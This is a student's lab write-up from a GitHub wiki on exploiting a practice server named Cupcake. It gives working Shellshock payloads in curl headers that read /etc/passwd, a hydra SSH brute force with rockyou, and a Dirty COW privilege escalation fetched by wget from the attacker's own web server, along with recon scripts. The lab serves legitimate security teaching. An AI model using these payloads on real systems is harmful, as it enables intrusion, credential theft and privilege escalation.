Lab 4.1: Exploiting Cupcake - squatchulator/Tech-Journal GitHub Wiki
In this lab, I had a lot of trouble getting the remote code execution working properly. The commands had strange syntax that I wasn't familiar with, and a lot of what was slipping me up was just small syntax mistakes. Adam was a huge help in class with diagnosing what exactly in those one-liners was incorrect. Another issue I had was getting hydra to work properly. I wasn't sure if I was using the tool wrong or if the /etc/passwd file on the target system was messed up from another user, but I wasn't able to brute-force using hydra so I just entered each password in the generated list instead (not realistic for bigger applications, but worked for now). I would like to learn more about hydra though, as it's a really interesting tool and I was not aware that tools like this existed.
-
sudo nmap 10.0.5.23- The server has ports 22 and 80 open.
-
sudo nmap -A 10.0.5.23- Port 22 is running OpenSSH 5.3 (Protocol 2.0)
- Port 80 is running Apache httpd 2.2.15 on CentOS (Linux Kernel v2.6)
-
curl http://10.0.5.23<a href="../cgi-bin/status">Server Status Report</a>
- First, install nmaptocsv with the following commands:
sudo apt update
sudo apt install python3-pip
sudo pip install nmaptocsv
- Then, export the nmap to a csv.
sudo nmap -sT -sV --top-ports=100 10.0.5.23 -Pn -oG top100.txt
nmaptocsv -i top100.txt -d ","
- Copy output, paste into spreadsheet, and select "Split text to columns"
Vulnerabilities: https://vulmon.com/vulnerabilitydetails?qid=CVE-2012-4558&scoretype=cvssv3 https://vulmon.com/vulnerabilitydetails?qid=CVE-2012-4557&scoretype=cvssv3 https://www.exploit-db.com/exploits/34900 (Shellshock)
- Determine the target's running kernel version
------------------
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23
- Show OS release
------------------
curl -H "User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/redhat-release" bash -s :'' http://10.0.5.23/cgi-bin/status
- Show contents of /etc/passwd
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://10.0.5.23/cgi-bin/status --output - >> users.txt
- Show code behind the status cgi
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat ../cgi-bin/status' bash -s :'' http://10.0.5.23/cgi-bin/status
- Show results of running ifconfig
------------------
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s :'' http://10.0.5.23/cgi-bin/status
Extract the contents of the rockyou password list with:
-
zcat /usr/share/wordlists/rockyou.txt.gz | grep -i samwise >> passwords.txtNow, run a Hydra against that user with all the possible passwords: hydra -l samwise -p passwords.txt 10.0.5.23 -t 4 ssh
- On Kali, run
searchsploit -m 40839to pull the exploit - Spawn a temporary web server instance with
python3 -m http.server 9191(port can be whatever) - On the target system, make a new working directory and run
wget http://<attacking ip>:9191 - Now, compile the exploit code with
gcc 40839.c -o cow -lpthread -lcrypt - Run the code with
./cowand enter a new password. - To reset the machine, run
mv /tmp/passwd.bak /etc/passwd
active-recon.sh
#!/bin/bash
ip=$1
dnsserver=$2
if [ "$#" -ne 2 ]; then
echo "Incorrect parameter usage. Usage: $0 <ip> <dnsserver>"
exit 1
else
echo "Working..."
fi
echo "DNS Resolution for $ip" >> recon.txt
nslookup $ip $dnsserver | grep name >> recon.txt
sudo nmap -A 10.0.5.23 >> recon.txt
curl http://$ip >> recon.txt
dns-resolver.ps1
# Script help from: https://red-gate.com/simple-talk/sysadmin/powershell/how-to-use-parameters-in-powershell/
$pref=$args[0]
$server=$args[1]
$table = @()
for ($i = 0; $i -lt 255; $i++){
$ipaddr = "$pref.$i"
$result = Resolve-DnsName - DnsOnly $ipaddr -Server $server -ErrorAction Ignore
if ($result){
$ipTable = New-Object PSObject -Property @{
IPAddress = $ipaddr
NameHost = $result.NameHost
}
$table += $ipTable
}
}
$table | Select-Object IPAddress, NameHost | Format-Table -AutoSize